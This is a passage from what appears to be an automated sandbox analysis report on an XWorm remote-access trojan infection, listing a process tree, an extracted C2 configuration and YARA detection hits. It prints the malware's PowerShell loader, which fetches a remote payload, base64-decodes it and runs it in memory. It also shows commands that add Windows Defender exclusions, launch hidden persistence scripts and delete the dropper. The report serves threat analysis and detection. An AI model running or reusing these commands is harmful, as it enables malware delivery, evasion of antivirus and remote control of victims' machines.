New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4944 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6276 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 4484 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7292 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7324 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7300 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7336 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8080 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8176 cmdline: powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 8088 cmdline: cmd.exe /c del "C:\Users\user\Desktop\DEVIS_VALIDE.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 3312 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2568 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8032 cmdline: powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 2540 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 2848 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1820 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8300 cmdline: powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 8472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 8656 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8700 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8896 cmdline: powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 9048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 9004 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 8256 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8224 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2812 cmdline: powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 4080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["moneyluckwork.ddns.net", "moneyluck.duckdns.org"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8728:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x87c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x88da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x82ba:$cnc4: POST / HTTP/1.1
0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9a98:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9b35:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c4a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x962a:$cnc4: POST / HTTP/1.1
00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12fb58:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12fbf5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12fd0a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12f6ea:$cnc4: POST / HTTP/1.1
00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xb130:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb1cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb2e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xacc2:$cnc4: POST / HTTP/1.1
00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9a10:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9aad:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9bc2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x95a2:$cnc4: POST / HTTP/1.1
0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x14cce0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14cd7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14ce92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14c872:$cnc4: POST / HTTP/1.1
00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xe4508:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe45a5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xe46ba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe409a:$cnc4: POST / HTTP/1.1
00000006.00000002.1895604908.0000024FE2752000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa4d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa56d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa682:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa062:$cnc4: POST / HTTP/1.1
00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x14cf30:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14cfcd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14d0e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14cac2:$cnc4: POST / HTTP/1.1
00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9d10:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9dad:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9ec2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x98a2:$cnc4: POST / HTTP/1.1
0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x14c630:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14c6cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14c7e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14c1c2:$cnc4: POST / HTTP/1.1
Process Memory Space: powershell.exe PID: 6536	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3372d:$b2: ::FromBase64String( 0x3379c:$b2: ::FromBase64String( 0x76bba:$b2: ::FromBase64String( 0xada6d:$b2: ::FromBase64String( 0xadadc:$b2: ::FromBase64String( 0xae66:$s1: -join 0xe799:$s1: -join 0xb0769:$s1: -join 0xb07a4:$s1: -join 0xb086b:$s1: -join 0xb0899:$s1: -join 0xb0a55:$s1: -join 0xb0a78:$s1: -join 0xb0d45:$s1: -join 0xb0d66:$s1: -join 0xb0d98:$s1: -join 0xb0de0:$s1: -join 0xb0e0d:$s1: -join 0xb0e34:$s1: -join 0xb0e5f:$s1: -join 0xb0e7b:$s1: -join
Process Memory Space: powershell.exe PID: 6276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 8080	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 8080	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: powershell.exe PID: 8080	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x6cfbe:$b2: ::FromBase64String( 0x6d127:$b2: ::FromBase64String( 0x70323:$b2: ::FromBase64String( 0x9dfc2:$b2: ::FromBase64String( 0xa6807:$b2: ::FromBase64String( 0x1062c6:$s1: -join 0x10d9b7:$s1: -join 0x1691:$s3: reverse 0x197f:$s3: reverse 0x2099:$s3: reverse 0x2852:$s3: reverse 0x99e1:$s3: reverse 0x9dfb:$s3: reverse 0xa983:$s3: reverse 0xb630:$s3: reverse 0xb5a96:$s3: reverse 0xbc6eb:$s3: reverse 0xbe711:$s3: reverse 0xc9740:$s3: reverse 0x12d215:$s3: reverse 0x13710c:$s3: reverse
Process Memory Space: powershell.exe PID: 2568	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 2568	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: powershell.exe PID: 2568	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x6e8b0:$b2: ::FromBase64String( 0x770f5:$b2: ::FromBase64String( 0xf7a84:$b2: ::FromBase64String( 0xf7bee:$b2: ::FromBase64String( 0xfadea:$b2: ::FromBase64String( 0x10dec1:$s1: -join 0x1156dd:$s1: -join 0xccc:$s3: reverse 0x794e:$s3: reverse 0x976b:$s3: reverse 0x1479a:$s3: reverse 0x1993f:$s3: reverse 0x19c2d:$s3: reverse 0x1a35d:$s3: reverse 0x1ab26:$s3: reverse 0x2170d:$s3: reverse 0x21b27:$s3: reverse 0x226af:$s3: reverse 0x2335c:$s3: reverse 0x88126:$s3: reverse 0x93a82:$s3: reverse
Process Memory Space: RegAsm.exe PID: 2540	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 1820	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 1820	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: powershell.exe PID: 1820	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x525c8:$b2: ::FromBase64String( 0x5ae0d:$b2: ::FromBase64String( 0x6fe78:$b2: ::FromBase64String( 0x6ffe1:$b2: ::FromBase64String( 0x731dd:$b2: ::FromBase64String( 0x11acb:$s1: -join 0x1935a:$s1: -join 0x40fe4:$s3: reverse 0x48b10:$s3: reverse 0xc1fd7:$s3: reverse 0xc22c5:$s3: reverse 0xc29df:$s3: reverse 0xc3198:$s3: reverse 0xca20b:$s3: reverse 0xca625:$s3: reverse 0xcb1ad:$s3: reverse 0xcbe5a:$s3: reverse 0xdb10d:$s3: reverse 0xe6988:$s3: reverse 0xdbd7:$s4: += 0xdbf6:$s4: +=
Process Memory Space: powershell.exe PID: 8700	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 8700	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
